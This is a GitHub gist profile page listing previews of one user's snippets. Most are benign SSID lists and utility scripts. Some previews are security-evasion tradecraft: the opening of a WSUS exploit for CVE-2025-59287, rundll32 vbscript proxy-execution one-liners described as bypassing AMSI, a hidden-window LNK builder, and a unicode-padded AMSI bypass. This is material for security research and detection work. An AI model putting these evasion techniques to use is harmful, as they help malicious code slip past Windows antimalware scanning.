Skip to content

Instantly share code, notes, and snippets.

View bobby-tablez's full-sized avatar

Bobby-Tablez bobby-tablez

View GitHub Profile
@bobby-tablez
bobby-tablez / CVE-2025-59287.txt
Last active November 3, 2025 17:23
WSUS-POC for CVE-2025-59287
# Disable SSL certificate validation for lab environment
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
# ORIGINAL CODE /CREDITS: https://hawktrace.com/blog/CVE-2025-59287-UNAUTH
function Get-AuthCookie {
param(
[string]$Target,
[string]$ServerId = $null
)
@bobby-tablez
bobby-tablez / DEFCON_33_SSIDs.txt
Created August 11, 2025 20:11
A list of all gathered SSID's from the DEF CON 33 conference
# This list contains all gathered SSIDs from the DEF CON converence from Aug 7-10, 2025.
# These were gathered via a HAK5 Wifi Pineapple MK7 over 2.4GHz and 5GHz
.@ FreeTRUEWIFI
BB16PRO
CC_GUEST
Pensiunea Folea 1
zeexw xe. ex xe xersZara's!z
!KnightsInn WiFi
#DXB Free WiFi
@bobby-tablez
bobby-tablez / kramer_python_deobfuscator.py
Created June 11, 2025 19:36
Kramer Python Deobfuscator
# This Python script decrypts Kramer obfuscation by reversing its obfuscation and bruteforces the key.
# Detects and uses al CPU threads, so your milage may vary with how long it takes.
# Defaults to key ranges from 3-1000000 as generated in kramer.py
# If the key is found it will print the result to stdout
# Obfuscator: https://github.com/billythegoat356/Kramer
import sys
import marshal
import types
import dis
@bobby-tablez
bobby-tablez / DEFCON_32_SSIDs.txt
Created August 14, 2024 18:09
A list of all gathered SSID's from the DEF CON 32 conference
# This list contains all gathered SSIDs from the DEF CON converence from Aug 8-11.
# These were gathered via a HAK5 Wifi Pineapple MK7 (2796 SSIDs in total)
#Contabilidad
#FreeStationWiFi
#Latomatina
#Moynihan-PublicWiFi
#MyBWI-Fi
#SFO FREE WIFI
#Super8
@bobby-tablez
bobby-tablez / theme.ps1
Last active November 24, 2025 16:39
Enable Dark or Light mode in Windows via PowerShell
# Modify Windows 10/11 or Server theme (Light or Dark mode). Makes registry changes which
# take effect upon reboot, or explorer.exe restart. Bypasses restriction to change theme on
# unactivated Windows installations.
#
# Usage:
# To switch to dark mode, run: .\theme.ps1 -Mode dark
# To switch to light mode, run: .\theme.ps1 -Mode light
#
# Optional: Restart the explorer.exe process:
# "Stop-Process -Name explorer -Force; Start-Sleep -Seconds 2; Start-Process explorer"
@bobby-tablez
bobby-tablez / proxy_execution_bypass_T1218.txt
Created February 25, 2024 00:37
Proxy Execution Using Rundll32.exe Vbscript
# A list of CMD/PowerShell scripts which leverage the T1218.011 proxy execution technique. Currently bypasses AMSI as of 02/2024.
# CMD
rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"\\\\..\\\\mshtml\\\\..\\\\mshtml\\\\..\\\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"/\/\../\/\mshtml/\/\../\/\mshtml/\/\../\/\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"\\....\\mshtm\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
@bobby-tablez
bobby-tablez / lnk_builder.ps1
Last active January 24, 2024 14:35
PowerShell Shortcut LNK Builder
# Set IconLocation to app or dll to change its appearance https://www.digitalcitizen.life/where-find-most-windows-10s-native-icons/
$LinkStart = New-Object -comObject WScript.Shell;
$lnk = $LinkStart.CreateShortcut("$env:USERPROFILE\Desktop\my_new_shortcut.lnk");
$lnk.IconLocation = "$env:WINDIR\System32\notepad.exe";
$lnk.TargetPath = "cmd.exe"
$lnk.WindowStyle = 7; # hidden
$lnk.ArgUments = '/c calc.exe';
$lnk.Save() | Out-Null;
@bobby-tablez
bobby-tablez / rename-media.ps1
Created January 5, 2024 03:20
Batch Rename and Format Media Files
<#
Batch rename "downloaded" media files to make the file names more appealing.
Supply a directory to be scanned recursively: "rename-media.ps1 C:\path\to\media"
IE: "the.sum.of.all.fears.2002.1080p.BLAH.Text.Atmos.COOLPEOPLE.mkv" to "The Sum Of All Fears (2002).mkv"
#>
Param (
[string]$Path
)
@bobby-tablez
bobby-tablez / unicode_amsi_bypass.txt
Last active March 29, 2024 17:25
AMSI Bypass Unicode Combining
# This simply echos a huge amount of overlapped or combined unicode characters before and after an unobfuscated AMSI Bypass.
# This somehow allows the user to run whatever then want inside the overlapping character blobs.
# Currently bypasses Defender Dec. 2023
#
# Writeup: https://x00.zip/amsi-bypass-using-unicode/
# Overlapping Unicode Chars: https://c.r74n.com/combining
# AMSI Bypass: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
'B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡';[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').
@bobby-tablez
bobby-tablez / DC31_Wifi_SSIDs.txt
Created September 8, 2023 16:33
DEF CON 31 WIFI Networks
# This list contains all SSIDs I observed during defcon 31. Includes registration, walking around the con. Captured using a Pineapple MK7
!!
#ATTHEMOXY
#Free Simon Wi-Fi
*WIFI-AIRPORT
.WynnEncoreGuest
.YUL Wi-Fi
01-STATION-INN
07edba9d8f623dc6f4d86eccf53d1280